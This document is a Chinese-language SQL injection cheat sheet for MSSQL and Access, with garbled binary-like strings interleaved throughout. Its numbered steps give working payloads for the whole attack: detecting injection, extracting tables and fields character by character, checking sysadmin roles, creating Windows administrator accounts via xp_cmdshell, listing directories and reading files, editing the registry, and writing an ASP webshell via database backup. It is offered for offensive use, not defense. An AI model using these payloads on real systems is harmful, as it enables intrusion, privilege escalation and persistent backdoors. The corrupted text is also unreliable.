1.判断是否有注入;and 1=1 ;and 1=2 aB~=WWL�R\
2.初步判断是否是mssql ;and user>0 �H�g+bmwM�
'dd[=�vz�K
3.注入参数是字符'and [查询条件] and ''=' :w26d-�QR(
~J1Uz�UxX2
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �K;~I�;G
�u��[L��sH
5.判断数据库系统 tzG.)U�qs�
�&BRi�& &f
;and (select count(*) from sysobjects)>0 mssql ��=R�||c�
}b]z+4U�a(
;and (select count(*) from msysobjects)>0 access �����X8���
xY`$j�'��u
'��8"$�:y�
hW�iBLip,z
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \a�GTi�
pB
f�T�V3lyk�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 T@�on
ue7
�D�ZU}� p�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 7�HEU�mKb"
K�w&t\},8@
9.(1)猜字段的ascii值(access) { VFr8F0*H
|BE`A�SW�;
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 >?^_JE��C6
Qr]`flQ�8
(2)猜字段的ascii值(mssql) =.6JvX<d1*
, n�4�7�.S
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 b,-qy��JW6
W�[oQp2 =
10.测试权限结构(mssql) �ck#MpQ!An
),4�c�b�
%gV��~e�@|
!�^(?�C@TQ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��S0p[��Kt
/��\��U�FJ
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �;����+R��
�eG��lPi�|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- dW"��=/UW
3W"l}.&ZJ"
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 6e At`L[K.
:e��W`E�l
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- .#}�`r�`/
S2"H���E`�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �vU��gMfy&
J4q_}^/2�w
;and 1=(select IS_MEMBER('db_owner'));-- fV5MI[���t
0I"r*;�9?K
C�c>+�OUL�
Tj,1]_`=V$
11.添加mssql和系统的帐户 l�b��<D,&+
6�1&��A��`
;exec master.dbo.sp_addlogin username;-- 4Y4QR[>IU3
;exec master.dbo.sp_password null,username,password;-- U|)�C�ZcM�
_Rm�1�-,3�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- GGkU�$qp2~
i�>=�!6Hu2
;exec master.dbo.xp_cmdshell 'net user username password NT<vs"<�B�
�DjveMs$�d
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- n��8'#�'^|
)�XoIb[s�"
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4�5$�F�c�K
si`h(�VD9w
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- )C�UB�7D)=
.u$o^; z!�
F4
�:#�okt
#^�eXnhj�9
12.(1)遍历目录 2H2Yxe7?�-
PNh��xF C.
;create table dirs(paths varchar(100), id int) ad�,pHJ��`
>}6V=r3[+�
;insert dirs exec master.dbo.xp_dirtree 'c:\' 5�� �p! rZ
h��SF4-Vvb
;and (select top 1 paths from dirs)>0 _!Ir�|�j.A
;�A;FR�3=)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) "v�N~7��%
IO}5�3zn<l
Z<�@dM2b�)
D:vX/m�f;7
(2)遍历目录 ~mK|~x01�@
�9 Aq�\1QC
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- !OL[1_-4|K
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��1C�pIK$/
0`�%Ask��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 CK��r5���L
xdkC>o�4�>
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 u#��~q86�k
K ��*xca(6
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ;�{f4E)t 7
qttJ*�z�u�
_0��E���KE
}>��< v7��
13.mssql中的存储过程 qpX�sQim$~
R.$1��aqA}
xp_regenumvalues 注册表根键, 子键 kP,�^c��{�
Xj�s`iK=�w
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #�f-pkeaeq
r`5�s�vY��
xp_regread 根键,子键,键值名 �I*�hz�lE�
5VhJ*�^R`y
;exec xp_regread �w-w���ap
/7jb��&f �
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 m%)Cw)t�
7
wC`+^�>WFo
xp_regwrite 根键,子键, 值名, 值类型, 值 m)Sdo�gt_�
^q)���AO?_
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 B`?}j�Ja9*
}`^D�O�
Ar
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �LM�T��z/M
�uwo\F���I
xp_regdeletevalue 根键,子键,值名 d_aHUmI�^"
$s"�{C"4�q
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 } z�a�"r�U
�c=��#V*<�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �x#�c�%��+
�"1|\V.>>;
O"V;o�tlC�
nC��(�<eL�
14.mssql的backup创建webshell =]m,7�v Rq
EUjA-L(�
use model R�8C��#D�B
()o[(Hx+ph
create table cmd(str image); z6�x��`O-\
�gOLN7K-)�
insert into cmd(str) values (''); ��jU0E=;�1
uN+]q� qCf
backup database model to disk='c:\l.asp'; "�^�Ns�bA+
4�I!g�?Moh
Z�)'��gj��
w�:c9Z=KX�
15.mssql内置函数 Z�,1b$��:+
~>�B`T%�=H
;and (select @@version)>0 获得Windows的版本号 r}i}4�K[�1
�45.Vr[FS.
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �8~ w��P?�
pxb�4x#CC
;and (select user_name())>0 爆当前系统的连接用户 8KMo��!p\i
�t+Au6/Dx?
;and (select db_name())>0 得到当前连接的数据库 � K�GJ��*h
_:7:ixN[Ie
��kY^ k*-v
"X,*V�Ql�:
16.简洁的webshell /_qW?LKG/�
DVz_;m�6�)
use model p-�XO4Pc�6
L25%KGg'�o
create table cmd(str image); )1�8C(V-�x
6<���ml�x'
insert into cmd(str) values (''); \dJ�OZ2J<z
2�KtK.2;�7
backup database model to disk='g:\wwwtest\l.asp';
